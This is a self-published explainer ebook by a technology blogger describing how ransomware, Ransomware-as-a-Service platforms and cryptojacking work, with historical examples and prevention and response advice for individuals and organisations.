Ransomware

How Ransomware Attacks Work

ANYALEBECHI ELISHA

CONTENT

PART ONE:

How Ransomware Attacks Work

PART TWO:

Ransomware as a Service

PART THREE:

Transition to Cryptojacking

INTRODUCTION

Welcome.

Ransomware attack is one of the major cyber threats as of today. In recent years, ransomware attacks have become so popular. Hackers use it to make money.

Ransomware attack is a type of malware attack where a malware holds victim’s files at ransom.

Victim is denied access to his files or computer until he pays the ransom.

Ransomware attack is an interesting topic.

This book is designed to take you through all you need to know about ransomware attack.

Part one explains how ransomware attack works. And some examples of ransomware attacks.

Part two teaches Ransomware as a Service (RaaS). RaaS is a malicious business model. Hackers sell ransomware attack kits to people who are interested in deploying attacks with them. This is just like Software as a Service business model.

The last part is dedicated to cryptojacking. Cryptojacking is another form of malware attack.

It is the malicious act of mining cryptocurrency with a victim’s device without his consent. Hackers install cryptojacking malware in victims’ devices and use them to mine cryptocurrency.

In all, you will learn how to prevent ransomware attack.

Enjoy!

PART ONE

HOW RANSOMWARE ATTACKS WORK

Ransomware attack is a type of malware attack where victim’s access to their computer or files is denied and the victim is mandated to pay a ransom to regain access. This is a type of malware that locks a victim out of his files or computer entirely and demands a ransom before access can be regained. This type of malware locks victims out of their files by encryption. It encrypts victims’ files and denies them access. Such encryption requires a decryption key before it can be unlocked. So, attackers lock victims out and demand a ransom before they can release a decryption key with which the victims can unlock it. Simply put, a ransomware (ransom malware) infects a computer, encrypts files, denies the owner access to the files, and demands money before access can be granted to the victim. Access is granted by giving the victim a decryption key to decrypt the encrypted files. Once such malicious software takes over your system, you'll be unable to access your computer or files. Malicious actors behind ransomware attacks demand to be paid in cryptocurrency. This is because; cryptocurrency transactions are encrypted utilizing cryptography. So, the transactions are always anonymous. They chose to be paid in cryptocurrency because it helps them maintain anonymity. By choosing to be paid in cryptocurrency, they can’t get caught. The attackers always promise to restore access as soon as the ransom is paid. These criminals can’t be trusted. They promise to

release the decryption keys to victims as soon as they pay up. But there is no guarantee they will restore access upon payment. After all, they are criminals and anything can happen. When a ransomware encrypts files, it displays a ransom note on the computer screen. The ransom note explains to the victim how to pay the ransom and regain access to his computer/files. Different attack groups/types have their own ransom note. And the amount they demand differs as well. But they always demand an amount an organization or average individual can pay without looking back. In order to have a clear understanding of how ransomware works, you need to understand Public Key Cryptography.

What is Public Key Cryptography? Public Key Cryptography (PKC) is a type of cryptographic technology that works with two keys, namely: a public key and a private key. The private is kept secret and belongs solely to a person. On the other hand, the public is public and can be shared. The public key is used to encrypt a message. The message encrypted with a public key can only be decrypted using a corresponding private key. This technology is used to share sensitive data. When you want to share sensitive information, you can use cryptographic technology to encrypt the message and prevent other people from having access to it except those you grant access. When you want to share a confidential data, you can encrypt it using the recipient’s public key. Such message (a message encrypted with a given public key) can only be read or decrypted using the corresponding private key (held by the recipient, with whose public key was used to encrypt the message).

Cryptographic technology is used to protect data against unauthorized access or use. Those who utilize this technology acquire public and private keys from certification authorities. When people want to send an encrypted message to a recipient, they request the recipient’s public key. A recipient’s public key can also be gotten from a public key directory. The public key is used to encrypt the message. When the recipient receives the message, he decrypts the encrypted message using his private key. Remember, a private key is kept secret. PKC has lead to amazing advances on the internet. Malicious actors also utilize this technology to wreak havoc in the digital world. PKC was used to create malicious software called cryptovirus. When this virus infects a computer, it utilizes PKC to encrypt the files on the computer. The encryption can only be decrypted using the corresponding private key. When this is achieved, the hacker holds the files at ransom and demands to be paid before providing the decryption key. This is what’s known as ransomware – a malware that holds files for a ransom.

Brief History of Ransomware

Ransomware has been a popular internet problem. There have been many records of ransomware attacks. AIDS Trojan was the very first ransomware virus, created in 1989, by a Harvard trained Joseph L. Popp. 20,000 infected diskettes were circulated to the WHO's international AIDS conference attendees. The ransomware, known as PC Cyborg or AIDS Trojan, encrypted files on the PC and demanded the user to pay $189 by mail to PC Cyborg Corp.

The encryption used was not complicated. The encryption was not hard to decrypt. After a decade and more, ransomware attack has become so much popular. Another wave of ransomware blew in the year 2007. Winlock denied people access to their desktops. This was not file encryption. People were entirely locked out of their computers. It demanded payment to be made through a paid SMS before access could be restored. A new form of ransomware was developed in 2012. Law enforcement ransomware was developed by a group, Reveton. It locked victims out of their desktops and showed them a law enforcement agency (e.g., FBI) official-looking page. It would accuse the victims of committing a crime and demanded a fine to be paid before access could be granted. Victims were accused of crimes such as child pornography, hacking or illegal file download. Criminals used this social engineering tactics to trick victims into paying a ransom thinking they were under investigation by a law enforcement agency. In 2013, Cryptolocker reintroduced encrypting ransomware. It used high level encryption techniques. This made it very difficult for victims to regain their files without paying the ransom. Since then, malicious actors have seen ransomware as a profitable business. There have been uncountable records of major ransomware attacks. Terrible attacks such as WannaCry in May, 2017 and Petya in June, 2017, used complicated encryption to shake victims across the globe.

How Ransomware Spreads

The best approach to ransomware is to prevent infection. It becomes a tough task to get rid of the malware when infected. In order to be able to prevent ransomware attack, you need to understand how it spreads. Here's the breakdown of how ransomware spreads:

Social Engineering Criminals use social engineering tactics to lure potential victims into downloading a ransom malware. There are many tactics ransomware writers can use to deliver the malware to their targets. Phishing attack Phishing attack is a common tactic they use to deliver ransomware to their target's system. It comes in form of a malspam, with attachment or malicious links that come to the target in an email, masking it as a legitimate file. Once they are downloaded and opened, the malware activates and begins operations on the victim’s computer. Attackers employ these social engineering strategies to trick potential victims into clicking malicious links or downloading malicious files.

Let’s look at how it works:

The victim is tricked into clicking malicious links and/or downloading malicious files.

Criminals mask a ransomware and present to a potential victim as legitimate file (software, MS Word file, PDF file, etc.,). They also do it by presenting a link that looks helpful, but in reality, the link is a ransom malware download link. What cyber criminals do is that they find a way of luring user into downloading such files or clicking such links. The ransomware installs on the victim’s computer as soon as one of the above actions is taken.

Once the file is downloaded and opened or the link is clicked, the ransomware installs on the victim’s computer. Encryption of files starts.

When the encryption is complete, the ransomware displays a ransom note on the screen. The ransom note tells the victim how to pay the ransom and how to get the decryption key after payment is made.

Exploit Kit

This is a strategy where cyber criminals search for vulnerabilities in computer systems. A security loophole or unpatched points in a software or computer systems serve as a point of infection. Criminals exploit security loopholes and take advantage of it to deliver ransomware. In this case, a user does not need to click a link or download an attachment to be infected.

Exploit kits allow ransomware attackers to exploit users via a compromised website they've intruded. Attackers upload malicious code to the compromised website. The compromised website is used to exploit security loopholes of its visitor’s browser and other software that is running on the device.

Let’s look at how it works:

A potential victim clicks a link on a legitimate website that directs them to a compromised website. Such compromised landing page has a hidden exploit code. The hidden exploit code scans the operating system of the visitor’s device and the running software on the device for any vulnerability or security loopholes it can exploit. Once the exploit code finds a vulnerable point, it will inject a ransomware into the device.

Such exploit code is difficult to detect by security systems. This is what makes it very dangerous. It has a way of evading detection by antivirus systems.

Once the ransomware is injected into the vulnerable device, it activates and starts encryption. It displays a ransom note when it’s through encrypting the files.

Types of Ransomware

Leakware Encrypting ransomware Screen Lockers Scareware

Leakware

It is known as Doxware. This type of ransomware attack occurs when malicious actors threatens to publish victim’s files online if the victim refuses to pay the ransom.

` This poses a serious threat to companies that have classified information they wouldn’t want to be published online. Such companies are tempted to pay the ransom in order not to have their sensitive data published online. But there are questions that run through my mind as I write this. Will the criminals destroy the data after the ransom is paid? Even when they allow victims regain access to their files, won’t they retain copies of the files? Don’t you think they can still go ahead to publish the files online or market it on the dark web after receiving the ransom? The point is this, they are criminals. And as a result, they are capable of doing anything.

Encrypting Ransomware

This form of ransomware works by encrypting victim’s files and demanding a ransom. Attackers use complicated technology to encrypt files. This makes it very difficult to decrypt. Victims are not allowed access until they pay the ransom. Remember, paying the ransom does not guarantee access. This is why some organizations chose to clean up their systems and import their files from backup instead of paying the ransom.

Screen Lockers

Screen lockers as the name suggests, locks people out of their devices. It locks the screen and denies people access to their files and applications. It displays a full-size window telling victims to pay before access will be granted. Often, attackers pose to be FBI or law enforcement angencies, saying that an unethical activities have been noticed on victims computer.

And consequently, the victim should pay a fine before being able to have full access to his computer.

Scareware

Scareware pose to be a cleaning tool or cyber security software that has discovered a problem on your computer. And it requests to be paid in order to take care of the security problem. Some scareware may lock your computer buy many don’t. Scareware floods victim’s screen with alerts and pop-up messages – telling the victim to make a payment in order to clean up his system. Come to think of it, do you think a legitimate cyber security firm will beg and disturb you to pay and use their security software? No. Not at all! No reasonable company would do that.

Examples of Ransomware Attacks There are uncountable incidences of ransomware attacks. Many attacks have been recorded. In this section, I’ll take you through some popular ransomware attacks that made a big name in the world of cyber security.

1. WannaCry Ransomware

WannaCry ransomware became so popular in may, 2017. It attacked windows systems. It's a worm (cryptoworm) that encrypts victim’s data and demands for a ransom in bitcoin. WannaCry took advantage of the security loophole found in Microsoft Windows. They exploited an unpatched vulnerability. And many high profile companies and health institutions were affected. This shows the importance of updating applications. Outdated applications may have loopholes.

2. SamSam Ransomware

This type of ransomware is used to carry out targeted attacks. It gains access into a network and encrypts systems on the network. People behind this ransomware demand a high-value ransom. This ransomware selects its victims. They target companies that they dim capable of paying their ransom. SamSam takes advantage of security shortfalls. It also uses brute force techniques against weak passwords of Remote Desktop Protocol. Let’s take a look at what Malwarebytes Labs has to say about SamSam Ransomware: “SamSam ransomware is a custom infection used in targeted attacks often deployed using a wide range of exploits or brute-force tactics. In 2018, SamSam uses either vulnerabilities in Remote Desktop Protocols, Java-based Web Servers, or File Transfer Protocol (FTP) Servers to gain access to the victim’s network or brute force against weak passwords to obtain an initial foothold.”

3. BadRabbit Ransomware

This one locks a victim out of his computer and demands money to restore access. It uses social engineering to trick users to click a malicious link. It falsely alerts a potential victim that their Adobe Flash Player requires an update. Users download the ransomware when they click the link to update their Adobe Flash player. The malicious code is inserted into the HTML skeleton or Java files of insecure websites. Once a user clicks on the link (hoping to download a software update), the malware downloads on the victim’s computer. Usually, they demand for about $280 to be paid within 40-hour deadline. Record has it that this ransomware attack was mainly prevalent in Russia and Ukraine.

4. Petya Ransomware

It targets windows operating system. It infects and displays a ransom note that explains how to make the payment. Petya is a worm and spreads to other network by means of self propagation. Self propagation helps it achieve wide-spread infection. While researching on this topic, I came across an interesting piece by CSO Online. “… If you make the extremely bad decision to agree to this request, Petya will reboot your computer. You'll see what looks like the Standard Windows CHKDSK Screen you expect to see after a system crash. Rather than searching out specific files and encrypting them, like most ransomware does, it installs its own boot loader, overwriting the affected system’s master boot record, then encrypts the master file table, which is the part of the file system that serves as sort of roadmap for the hard drive. In essence, your files are still there and still unencrypted but the computer can’t access the part of the system that tells it where they are, so they might as well be lost. At this point, the ransomware demands a bitcoin payment in order to decrypt the hard drive” – CSO Online

5. GoldenEye Ransomware

GoldenEye infects victims through a Microsoft Office document delivered via email. This type of ransomware gives victims a 96-hour deadline. The attackers employ phishing tactics to lure victims into downloading the malicious document. After encrypting victim’s files, they demand for a ransom and give a 96-hour deadline.

How to Protect Yourself & Organization from Ransomware Attack

Awareness

Education remains the best approach to ransomware attack prevention. You've to educate yourself and organization on this subject. Human beings are the last line of defense. Everyone should be educated on how cyber attackers deploy ransomware attacks. Make sure you train your employees very well. They should be able to spot malicious attachments and links. Attackers use social engineering to lure victims into installing malware. Give yourself and organization enough training.

Invest in Cyber Security

Prevention is better than cure. You’ve to protect your business with standard security systems. Many fail to do this. But they spend a lot of money in disaster recovery when they fall victim of a cyber attack. Instead allowing yourself or business to be attacked, it’s expedient to invest in standard security system right from time. Taking preventive measures remains the best approach.

Back Up Your Files on a Regular Basis

This is very important. Back up your files on a regular basis. And make sure you disconnect the hardware from your network immediately after back up. It can get infected if you fail to disconnect it. You can also embrace cloud services. Whichever way, the major thing is that you should have a backup of your files. This makes you recover from an attack without losing precious data.

With backups, you just need to clean up an infection and upload your files from backup. Companies with strict back-up policy don’t cry when attacked. This is simply because; they know how to go about it.

Update Your Operating System and Applications Unpatched software is prone to attack. If you fail to install new updates to your operating system and applications, you give hackers the chance to locate vulnerability in your system. WannaCry ransomware took advantage of the unpatched vulnerability in Microsoft Windows software. Meanwhile, the company had released a patched version of the software, but those victims didn’t update theirs. It’s a tough task to keep track of all software updates. But you can make the work easier by turning on auto update function. This will allow applications to update automatically. Malicious hackers are always searching for vulnerabilities to exploit. Keep your operating systems and applications intact. Remember that anti-virus programs should be kept up to date. In fact, when an anti-malware program is outdated, it affects its sensitivity. This means that the security program may not be able to identify the most recent strains of malware.

Don’t Download Software from Sites That Are Not Trustworthy

Don’t install software from unknown or unauthorized sources. If you don’t trust the source, don’t download it. Distribution of malicious software is one of the popular ways cyber criminals lure users into installing ransomware.

Don’t give stranger-software administrative privileges. Giving a program administrative privilege provides a fertile ground for the malicious program to exploit you to the fullest.

Inspect Every Email Attachment

Malspams are used to distribute malware. Don’t open email attachment automatically. Opening email attachment automatically will make you more vulnerable to malware attack. There is need to inspect attachments thoroughly before opening them. This should be done especially when the email is from an unknown source. If the email is suspicious; then treat it as such. Don’t open an attachment because of a catchy title or because it's familiar (coming from an institution you know). Thorough inspection should always be carried out.

Embrace Cloud Services This is a good option if you can’t cope with the demands of complex cyber security strategies. There are some reliable cloud services out there. Enjoy cloud services and leave the cyber security worries for them. Companies and individuals are advised to upload their sensitive files to the cloud. This makes it easy to recover from an attack. Embracing a cloud service does not replace the need for employee awareness program. You shouldn’t be careless just because your files are secure in the cloud.

How to Respond to Ransomware Attack

Identify the Type of Ransomware

This is a very important step. You have to identify the type of ransomware. Every ransom malware has unique features. And having understanding of the ransom malware is an essential step towards getting rid of it. Knowing how the ransomware works helps in strategizing the appropriate security measures. Cyber security experts will be of better help when they succeed in identifying the ransomware and how it works.

Don’t Pay the Ransom

Companies are tempted to pay the ransom in order to regain access to their data and stabilize business. They compare the cost of cleaning up an attack and the ransom, and often times they arrive at a conclusion to pay the ransom instead of going through the pain of rebuilding their systems. This fact compels companies into paying the ransom. Even companies that have policies that are against paying the ransom end up paying when they are hit. Ransomware attack put organizations in tight corners. There is something noteworthy. Paying the ransom does not guarantee access to your files. The criminals may still refuse to release the decryption code after receiving payment.

Also, remember that some ransomware destroys files while encrypting them. This is why having a reliable backup is very important. The best approach is not to pay the ransom. FBI advises that no one should pay the ransom. This advice is based on the logic that paying the ransom will encourage attackers to launch more attacks. Lack of adequate backup is what compels victims to consider paying the ransom.

Solicit Assistance of Security Experts

There are experts in this field. They are in good positions to give appropriate advice. Ransomware is a threat that requires profound meticulousness. Don’t take major actions without consulting experts. This step will save you the pain of wrong decisions. Experts will help you map out effective strategies to recover from any type of malware attack.

Free Decryptors

Not every ransomware has a free decryptor. Some ransomware can be deactivated using a decryptor. Experts have been able to come up with free decryptor for some widely studied ransomware. This must be done with thorough examination of the ransomware. The ransomware has to be rightly identified before applying the decryptor. This is because using a wrong decryption key on a malware can lead to more encryption of your files. Applying a wrong decryption tool has negative effects. So, there is need to identify the ransomware so as to deploy the appropriate decryption tool.

Clean Up Infection and Restore Your Files

Disaster recovery can be painful. But this is bearable if you have a complete backup of your files. In this case, you have to scan your system, get rid of the malware and restore your files from backup. This can be complicated depending on the type of ransomware, level of encryption and the type of system/network affected. Some ransomware renders the computer useless. This means that the computer may not be useful even after scanning the computer. Example of such ransom malware is NotPetya. NotPetya destroys computers it infects. This explains why it’s not considered a ransomware. Creators of NotPetya are not interested in the money. The extent of an attack informs the disaster recovery strategy. A complicated attack will require a corresponding recovery strategy. A company where the whole systems are attacked has more to clean up than a company where two or three computers are affected.

PART TWO

Ransomware as a Service

Ransomware as a service copies from SaaS, and is a situation whereby ransomware creators distribute ransomware kits to affiliates and make it easy for them to launch attack. They receive a percentage of the ransom. In this case, people who know nothing about coding can simply buy the malware and launch attacks. RaaS is in such a way that the creators provide the affiliates with everything they need to launch a successful attack. They create advert about their business on the dark web. They host tutorials for those interested in what they offer. They design their service in such a way that an affiliate has a login dashboard from where he/she can fully partake of what the malicious actor has to offer.

How it Works

Just like SaaS vendors, RaaS vendors create a vendor platform (websites) and offer their services on the dark web. They create a website where affiliates can sign up and have access to ransomware attack kits. Instead of going through the stress of writing codes, RaaS vendors, make it easy for people to carry out attacks. Once an affiliate signs up, he/she will have access to attack tools.

RaaS vendors design their platforms just like the way legitimate businesses design theirs. They have dashboard to monitor the progress of affiliates. Money made from attacks is divided between the affiliates and the owner of the platform. How the money is shared is dependent on each platform’s policy. Information regarding money is available to the user. Criminals advertise this dirty business. And do tutorials just like legitimate businesses, teaching people how to make use of their services.

Examples of RaaS Platforms

Philadelphia

The name of the creators or criminal organization behind this RaaS operation is The Rainmakers Labs. They created the ransomware tools. They sold the attack tools for $400. With $400 anyone who is interested is furnished with the tools to launch ransomware attacks. The Rainmakers Labs run business just like legitimate SaaS companies. Before creating Philadelphia, Rainmakers Labs came up with Stampado. Stampado was sold for $39. Philadelphia was spread by malicious emails. And it targeted hospitals. They attacked hospitals in Washington and Oregon. Philadelphia is packaged just like legitimate software. It has promotional videos on YouTube. It also has a detailed guide on its website. It has a section where they teach affiliates how to make use of the platform. It has a detailed guide in a dot com website. Information about Philadelphia is open on the World Wide Web. This is unlike other RaaS platforms. Most RaaS platforms do their ugly business primarily on the dark web.

Satan

There is another RaaS platform known as Satan. Here is how it works. The people behind this scheme pay out 70% of the ransom to their affiliates and retain the remaining 30%. To join the platform, you don’t have to pay anything. It's free. On Satan platform, a new member has to sign up. After this, there is a specified process through which a member can create a new virus. When the virus is created, it’s downloaded. Until it’s downloaded, it can’t be used to infect users. After downloading the malware, an affiliate can then use it to launch attacks. Satan RaaS is highly customizable. A member is free to set his own price, carry out the attack as he wishes and give victims customized conditions. Satan platform collects the ransom and pays out 70% to her affiliates. They provide decryption tool to victims who pay up. Just like Philadelphia, Satan operates like a legitimate software company. They provide adequate support members need to carry out successful attacks. They do the hard part (tech) of the job and makes launching a ransomware attack a sweet process for affiliates.

Cerber

Cerber platform takes a 40% cut of the ransom. Here, affiliates sign up and do the work of finding victims. Cerber is selective when it comes to the nations it targets. Cerber deactivates when it infects computers in some nations. This happens when it infects computers in some nations like Armenia, Azerbaijan, Belarus, etc.

RaaSBerry

RaasBerry just like other RaaS platforms sells a ransomware kit that is ready to distribute. They do their own on subscription basis. RaaSBerry has five packages of ransomware kit. The price is dependent on the features of the kit and the length of command and control (C&C) server subscription. It provides customizable ransomware packages that are ready to distribute. The packages are pre-compiled with a bitcoin address you provide. The ransom is paid directly to the bitcoin wallet of their partners. RaaSBerry encrypts the files with a unique 265-bit AES key that is generated on-the-fly. The AES key is then encrypted using your unique RSA key. RaaSBerry has the following packages:

Plastic: one month C&C subscription - $60 Bronze: 3 months C&C subscription - $150

Silver: six months C&C subscription - $250 Gold: one year C&C subscription - $400

Platinum: 3 year C&C subscription - $650

The packages utilize advanced polymorphic techniques. These techniques are evasion strategies employed to evade antivirus detection. RaaSBerry, unlike other schemes, decrypts files automatically when the victim pays the ransom. It has a working technology that initiates/starts the decryption process as soon as the victim pays up. An affiliate specifies the ransom amount. The package randomly generates a unique amount to add. The kit is furnished with the intelligence to detect payment and in turn initiate decryption process.

The ransom note can be displayed in different languages.

Atom

Atom RaaS is a rebranded version of Shark RaaS platform with added features. They pay out 80% of the ransom to affiliates. The payment process is automated. The ransom is paid into the bitcoin wallet of the developers. And they promise to pay members automatically. Atom has a way of tracking the progress of its affiliates. It has a affiliate tracking ID. The ID is what they use to track the activity of members.

PART THREE

TRANSITION TO CRYPTOJACKING

HOW CRYPTOJACKING WORKS Cryptojacking is the malicious act of mining cryptocurrency with someone's device without the person's consent. It’s is the stealthy theft of computing resources to mine cryptocurrency. Malicious actors infect users’ devices with a cryotomining malware and mine cryptocurrency with the victims’ devices without their knowledge or consent. The cryptomining malware stays undetected in the background and utilizes the computing resources of the infected computer to mine coin. Cryptojacking code work in the background as the infected computer runs normal tasks. This, in most cases slows down the computer. Cryptomining scripts don’t damage victim’s files. But they utilize the CPU processing power to run complex mathematical equations and move the request to the hacker’s server. This is not limited to computers. It also affects mobile devices.

Understanding Cryptomining

Crypto mining involves solving complex mathematical problems. It requires computer and a special program. Due to complexity and competition in cryptocurrency mining industry, miners are required to solve a complex mathematical problem (with respect to a cryptocurrency transaction).

Whoever gets the answer to the complex problem first receives a reward in cryptocurrency. So, miners compete fiercely over solving the cryptographic mathematical problems. This makes crypto mining very competitive and capital intensive. It requires a great deal of computing resources in order to be able to solve the problem faster. Many who invest in mining coins buy hardware systems. These systems are not only expensive, running those causes a spike in electricity bill.

Why Cryptojacking Cases Increased Significantly in 2018

Ransomware attacks decreased by 45 percent in 2018; this was accompanied by a huge rise in cryptojacking. Cryptojacking increased by 450% in 2018. This report was released by IBM.

Experts were amazed at how cryptojacking attacks soared high. We’re going to look at why cryptojacking attacks were on the increase at that time (when ransomware attacks declined).

Hackers Prefer It

Cryptojacking activity can go undetected for a long time. And it does not interrupt the user from using the computer. So, hackers dimmed it more profitable because they keep making money without making much noise. This is unlike ransomware attack, where the users are pressured to pay. In this case, hackers make money without announcing themselves.

Continuous Income

In ransomware attack, victims pay ransom once. In some cases victims chose not to pay.

But in cryptojacking, hackers keep making money as long as they stay undetected.

It Makes Mining Coin Less Capital Intensive

Crypto mining is very capital intensive. It requires huge computing power. By stealing the computing resources of victims' devices, criminals mine coin with little expenses. Installing crypomining scripts on thousands of computers gives rise to a huge computing network that can mine cryptocurrency. The more devices you have working for you, the more coin you can mine. They link all the computers to a central server and utilize the additive computing abilities of the computers to mine coins. This reduces the cost of buying and maintaining heavy hardware. In essence, Malicious cryptominers consider cryptojacking a very lucrative and cool way of making money.

How it Works

It works by injecting a computer or browser with a crypto mining script. Once this happens, the hackers start mining cryptocurrency with your computer's resources. This happens in two major ways:

The hacker tricks you into clicking a malicious link. This is always done via a spam email. Once a potential victim clicks on a malicious link, the crypto mining code loads on the victim’s device. Then, the hacker can start using the victim’s device to mine cryptocurrency. The second one is a browser-based cryptojacking. It is also known as Drive-by cryotomining.

Criminals inject the code in a website or in an ad delivered to numerous websites.

Once you visit such compromised website, the cryptojacking code uploads on your browser and starts mining coin. Or once an infected ad pops up in your browser, the code executes automatically in your browser. This malicious process continues even when the victim leaves the website or closes the browser. Even though the browser looks closed, it remains active (mining coin) on the background in a hidden window that remains open. This happens as a pop-under. They achieve their aim by compromising as many devices as possible. They form a pool (botnet) of compromised devices. Hackers coordinate the activities of the botnet and use it to mine cryptocurrency.

The Effects of Cryptojacking

Slows Down Computers

Cryptojacking utilizes CPU power of computers. This slows down the processing speed of computers. Victims experience longer loading time or poor execution speed. In as much as cryptojacking script does no harm to the victim’s files, it steals computing resources. Therefore, it affects productivity.

Over Heating

Overheating is one of the effects of cryptojacking. Due to ceaseless use of the CPU to mine coin, the computer works round the clock. This results to overheating.

Increased Electricity Bill

Due to over activity of computer systems, organizations may have an increased electricity bill. Crypto mining processes suck electricity. High electricity bill is one the major factors that makes crypomining capital intensive. Organizations that have many of their computers cryptojacked are likely to experience hike in electricity bill.

Effect on IT Department

An organization having a cryptojacking problem spends a lot time and other resources trying to surmount the problem. Unless spotted on time, IT department labors a lot to restore the working conditions of cryptojacked computers. They spend a lot of time checking computers to place the source of their problems.

Waste of Financial Resources

Cleaning up cryptojacked systems cost money. It requires intervention of experts and specialized programs.

Short Life Span of Computers

This is already explained in points1 and 2 above.

Effects on Mobile Phone

I have pointed out earlier that cryptojacking also affects mobile phones. Here is what Malwarebytes Labs says about the effect of cryptojacking on phones: “Drive-by crypto mining can even infect your android mobile device. It works with the same methods that target desktops. Some attacks occur through a trojan hidden in a down-loaded application or user's phone can be redirected to an infected site that leaves a persistent pop-under.

There's even a trojan out there that invades android phones with an installer so nefarious, that it can tax the processor to the point that the phone overheats, makes the battery bulge, and essentially leaves your android for dead.” Some obvious effects of cryptojacking on mobile phones:

Hanging Overheating Makes the battery swell Kills the phone

Examples Cryptojacking Attacks

Coinhive

Conihive is a service that distributes cryptojacking code. They provide a JavaScript crypto mining code. The idea behind this service was to help website owners generate money from their websites without serving ads. Website visitors would read free content while their devices were used to mine bitcoin as long as they remain on the website. The coin mining script is terminated as soon as the visitor leaves the website. This is done with users' consent. This strategy worked at the beginning. People were aware that their devices were used to mine coin when they visit certain websites. It served as a better strategy than covering a website with ads. Things became bad when malicious actors messed up this idea. It became bad when hackers started mining coin with people’s devices without their consent. Coinhive keeps 30% of the cryptocurrency each account mines. This cryptojacking script is used to mine monero. So, they keep 30% of monero each account mines.

Criminals install this code on hacked websites. They do this without owners' consent or permission. Coinhive has a specialized cryptographic technology with which it identifies which user account is to receive reward. People (website visitors and website owners) complained of how Coinhive users take advantage of their websites and devices to mine monero without their consent. In response to such criticism, Coinhive released another version of coin mining script called “AuthedMine”. AuthedMine is different from the first script in the sense that it seeks a website visitor's consent before executing the script. Conhive came up with a great business idea but malicious actors messed it up. Some well known websites made legitimate use of Conhive’s service. But hackers took advantage of their service for their malicious intents.

Crypto-Loot

Crypto-Loot, just like Coinhive is a platform that offers website owners a script for mining cryptocurrency using the computing power of devices that visit their websites. Just like Coinhive, this service was legitimately designed to help webmasters make money. It’s done with the approval of their visitors. Cyber criminals abused this idea by compromising legitimate websites and browser extensions with the Crypto-Loot script, thereby stealing the processing power of devices to mine coin. Unlike CoinHive that keeps 30% of monero mined by its users, Crypto-Loot keeps 12% of the coin mined by its users.

PowerGhost

This is a fileless crypto mining malware that targets corporate networks and workstations. It doesn’t use any files, it is capable of mining coin from the memory.

It gains access by taking advantage of vulnerabilities in systems and also makes use of remote administration tool to launch attacks. It uses Power shell and Eternalblue to infect and distribute without detection over servers and computer systems. This fileless malware employs evasion techniques to avoid detection by antivirus programs. It evades detection by some powerful evasion techniques. Kaspersky Labs also discovered a version of this malware that has a tool for DDoS attacks. This suggests that cybercriminals can also utilize the tool for DDoS attacks – which offers another income stream.

Smominru Botnet

This is a cryptomining malware that infects windows systems and servers using the Eternalblue and EsteemAudit exploits. Smominru uses EternalBlue exploit to hijack devices to mine cryptocurrency – Monero. It also attacks MySQL databases on windows servers and Linux servers. Proofpoint reported that Tue BITNET infected more than 526,000 windows hosts – which were believed to be servers mainly. Russia, India and Taiwan were mainly attacked.

WannaMine

It’s hard to detect and block. It infects through malicious links (email attachments and infected websites). It mines Monero. It was discovered by Panda security. WannaMine is a fileless malware. And this makes it very difficult to deal with. Because of its fileless nature, its detection eludes AV programs. It takes advantage of existing tools on a machine it infects. It does not install files on the machine it infects. This grants WannaMine a strong AV evasion capability. It tasks computers so much. This kills computers and incurs serious replacement costs on organizations.

According to Pandasecurity, WannaMine spreads across networks cleverly. It uses Powershell and Windows Management Instrumentation to spread remotely (by capturing login details that allow it to connect to other computers). Panda Security says that WannaMine devices another strategy when one fails – which uses EternalBlue exploit to spread itself. WannaMine is difficult to uncover and block because it’s fileless and uses built-in Windows tools to wreak havoc.

How to Detect a Cryptomining Malware There are signs of cryptojacker infection. When you notice some these signs, know that your device may have been infected with a cryotojacker. Here're some of the signs you should be conscious of.

Cryptomining malware slows down devices It causes overheating of devices It causes a spike in CPU usage Spike in electricity bills Train your employees. Every employee in an organization should be furnished with the ability to detect this malware.

How to Avoid Cryptominer Infection

Block JavaScript in your browser. This procedure will also prevent you from enjoying some functions. Make use of anti-crytojacking programs.

There are some specialized programs that block cryptojacking. Nocoin and MinerBlock block cryptojacking in popular browsers. It’s advisable to use browsers that have built-in anti-cryptojacking program.

Make sure your device has no security loophole. You do this by updating your OS and applications as soon as new updates are released. Have a strict cyber security policy. This involves investing in cyber security programs and staff training.

Monitor your devices always. Monitoring devices closely helps in early discovery of infection.

How to Contain a Cryptojacking Attack

Involve experts on time. Avoid making series of mistakes before involving people that can help you. They will help you formulate appropriate disaster recovery plan. Identify how you were infected and tighten up. Formulate a strict security policy.

Thanks for reading.

A LITTLE ABOUT ME

I’m Anyalebechi Elisha Odo. I’m a technology blooger.

I offer freelance writing service.

Visit my website (anyaelisha.org) to know more about me.

You can contact me: elisha@anyaelisha.org